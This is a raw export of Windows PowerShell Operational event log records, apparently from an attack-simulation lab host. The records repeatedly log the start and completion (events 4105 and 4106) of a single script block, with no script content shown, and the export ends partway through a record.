LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468103
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468102
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468101
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468100
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468099
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468370
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468369
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468368
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468367
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468366
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468365
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468364
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468363
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468362
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468361
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468360
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468359
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468358
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468357
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468356
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468355
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468354
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468353
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468352
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468351
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468350
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468349
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468348
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468347
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468346
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468345
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468344
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468343
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468342
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468341
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468340
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468339
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468338
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468337
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468336
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468335
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468334
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468333
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468332
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468331
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468330
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468329
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468328
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468327
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468326
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468325
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468324
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468323
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468322
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468321
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468320
Keywords=None
